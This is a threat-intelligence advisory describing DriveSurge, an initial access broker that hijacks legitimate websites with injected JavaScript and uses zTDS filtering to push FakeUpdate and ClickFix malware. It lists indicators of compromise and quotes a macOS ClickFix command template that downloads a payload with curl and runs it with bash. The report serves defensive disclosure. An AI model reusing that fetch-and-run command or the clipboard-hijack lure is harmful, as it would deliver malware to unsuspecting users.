DriveSurge: Initial Access Broker Hijacks Thousands of Trusted Websites for ClickFix and FakeUpdate Malware Delivery via zTDS — Threadlinqs Intelligence
As of 2026-07-18, DriveSurge: Initial Access Broker Hijacks Thousands of Trusted Websites for ClickFix and FakeUpdate Malware Delivery via zTDS is a high-severity malware threat attributed to DriveSurge, tracked by Threadlinqs Intelligence with 9 detection rules (Splunk SPL, Microsoft KQL, Sigma) and 47 indicators of compromise.
Threat ID: TL-2026-0724 · Severity: HIGH · Status: ACTIVE · Category: MALWARE
Updated: 2026-07-18 · 2 updates · revalidated 2× · latest source
Attribution: DriveSurge · FINANCIAL
DriveSurge is an active, year-long initial access broker (IAB) operation that injects malicious JavaScript into thousands of legitimate high-reputation websites and silently redirects visitors through
DriveSurge is a mature, financially motivated cybercriminal operation first publicly named and tracked by Silent Push (report published 2026-05-30) and corroborated by Gridinsoft, Dark Reading, BleepingComputer, TechRadar, SC Media and Malwarebytes. It functions as a specialized Initial Access Broker (IAB) using a Pay-Per-Install (PPI) model, supplying downstream threat actors with high-quality, geo- and OS-filtered victim leads. The operation evaded detection for nearly a year, with attacker infrastructure observed in use since at least 2025-09-13.
The operation's core weapon is a Traffic Distribution System (TDS) built on zTDS, an open-source TDS publicly available at ztds.info and in circulation since at least 2015. DriveSurge compromises thousands of legitimate, high-reputation websites — across logistics (e.g. jclforwarding.com), education, technology, and healthcare — and injects obfuscated JavaScript loaders. Reported website-compromise vectors include exploitation of vulnerable CMS platforms; Malwarebytes documented 700+ Ghost CMS sites hijacked via the unauthenticated SQL injection CVE-2026-26980 (Ghost 3.24.0–6.19.0) during the same ClickFix wave, where the leaked Admin API key enabled injection of malicious code. Injected scripts call out to inject/loader domains (e.g. beacontrace.bond, webgleam.info, cptoptious.com, banerpanel.live, maxintora.com) using recognizable fingerprints such as `t.js?site=<32-hex>`, `t.<12-hex>.js`, `ext-b.`/`ext.<12-hex>.js`, and the zTDS `jsrepo?rnd=*` request. zTDS (analyzed at version 1.0.3) performs visitor fingerprinting and filtering — ASN/IP/referrer blacklists, bot-signature detection, mobile-operator IP filtering, captcha integration, and IPGrabber database checks (bseolized.com) — so that only fresh, targeted human victims are redirected while researchers, crawlers, and bots are shown benign content.
Visitors who pass filtering are funneled into one of two social-engineering lures. The first is a FakeUpdate browser-update prompt that impersonates roughly a dozen browsers (Google Chrome, Mozilla Firefox, Microsoft Edge, Safari, Opera, Brave, Yandex, Vivaldi, Samsung Internet, UC Browser, and an 'Other' category), urging the user to download a fake update that is actually malware. On Windows this delivers a 'Browser Update.exe' package (a ZIP containing DLLs plus an executable; SHA256 90aecb370dfb1a99a1f7de0a9c6842ab1b664521fddea16b0ec9a91f322646fc). The second lure is a ClickFix attack: a fake error/verification dialog impersonating Cloudflare or reCAPTCHA. When the user clicks a fake 'I'm not a robot' checkbox, JavaScript hijacks the clipboard (replacing its contents with a base64-encoded command disguised as a 'reCAPTCHA Verification ID') and instructs the victim to paste and run it in the Windows Run dialog / PowerShell or, on macOS, in Terminal.
DriveSurge maintains dedicated cross-platform payload chains. Windows victims receive PowerShell-staged downloaders (development path /assets/snippets/droppers/terminal_ps1_downloader/content.ps1). macOS desktop users — explicitly filtered to exclude iPhone/iPad even when a Macintosh user agent is present — receive a clipboard-hijacking Terminal command of the form `cd /tmp && curl -kfsSL "<payload_url>" -o <random_file> && bash <random_file> && rm -f <random_file>`, pulling Mach-O payloads from macOS payload servers (46.226.166.57, legacy 147.45.42.200, and C2 147.45.42.205:8133). ClickFix malicious code was also sourced from 91.92.240.127.
The infrastructure shows consistent tradecraft: domains registered through NiceNIC using temporary/disposable email (tempmail.so) — e.g. thiagorivera197151@ycyfugihih.cfd (first domain 2026-04-08) and pivot email samuel_jordan16@flixtrend.net — favoring the .icu TLD, nameserver ns1.erans.ru, and ASNs 203273 and 210644, with bulletproof hosting. Silent Push identified pre-weaponized but not-yet-active domains (brightson.icu, coverlink.icu, datumprobe.icu, eraggifts.icu, keyview.icu, traceglimps
Weaknesses (CWE)
CWE-89, CWE-1021, CWE-506, CWE-451
Target sectors: education, technology, logistics, healthcare, general public
Target regions: North America, Europe, Global
Detections & IOCs
As of 2026-07-28, this threat has 9 detection rule(s) across Splunk SPL, Microsoft KQL and Sigma, and 47 indicator(s) of compromise. Detection query text and full IOC values are available to authenticated users and programmatically via the Threadlinqs MCP server (Purple tier). View plans.
Community OSINT corroboration
3 of this threat's indicators have also been reported by the open-source security community, which observed at least one of them before this report was published. Community sightings are unverified and are kept separate from Threadlinqs' curated indicators. Indicator values, reporters and campaign linkage are available to authenticated Red-tier users.
MALWARE, HIGH, threat intelligence, cybersecurity, CVE-2026-26980, T1592, T1583, T1583, T1584, T1585, T1587, T1608, T1608, T1189, T1190